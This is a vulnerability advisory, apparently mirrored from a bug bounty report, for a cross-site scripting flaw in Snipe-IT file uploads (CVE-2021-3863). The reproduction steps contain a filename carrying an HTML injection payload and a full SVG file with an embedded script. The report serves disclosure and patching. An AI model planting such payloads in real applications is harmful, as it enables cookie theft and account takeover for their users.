Lucene search
Noobpk1DBC8D79-1B53-44A3-A576-FAEC78F29BA0HistoryOct 05, 2021 - 5:07 a.m.
Cross-site Scripting (XSS) - Generic in snipe/snipe-it
2021-10-0505:07:53
noobpk
www.huntr.dev
10
0.001 Low
EPSS
Percentile
31.1%
Description
At File Uploads allows for arbitrary execution of JavaScript
Step to Reproduct
XSS at filename
Goto detail of one asset
At tab File choose to upload file with filename contain payload: file'><img src>name
XSS when upload file .svg (In list file types are allowed don’t have file .svg)
Goto detail of one asset
At tab File choose to upload file svg with contain payload:
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
<script type="text/javascript">
alert("XSS");
</script>
</svg>
When uploaded, click to download
Impact
This vulnerability has the potential to steal a user’s cookie and gain unauthorized access to that user’s account through the stolen cookie.
Related
osv
osv
CVE-2021-3863
2021-10-19 13:15:11
Cross-site Scripting in snipe-it
2021-10-21 17:49:18
github
github
Cross-site Scripting in snipe-it
2021-10-21 17:49:18
cve
cve
CVE-2021-3863
2021-10-19 13:15:11
cnvd
cnvd
Snipe-IT Cross-Site Scripting Vulnerability (CNVD-2022-19844)
2021-10-22 00:00:00
nvd
nvd
CVE-2021-3863
2021-10-19 13:15:11
cvelist
cvelist
CVE-2021-3863 Cross-site Scripting (XSS) - Generic in snipe/snipe-it
2021-10-19 12:30:31
prion
prion
Cross site scripting
2021-10-19 13:15:00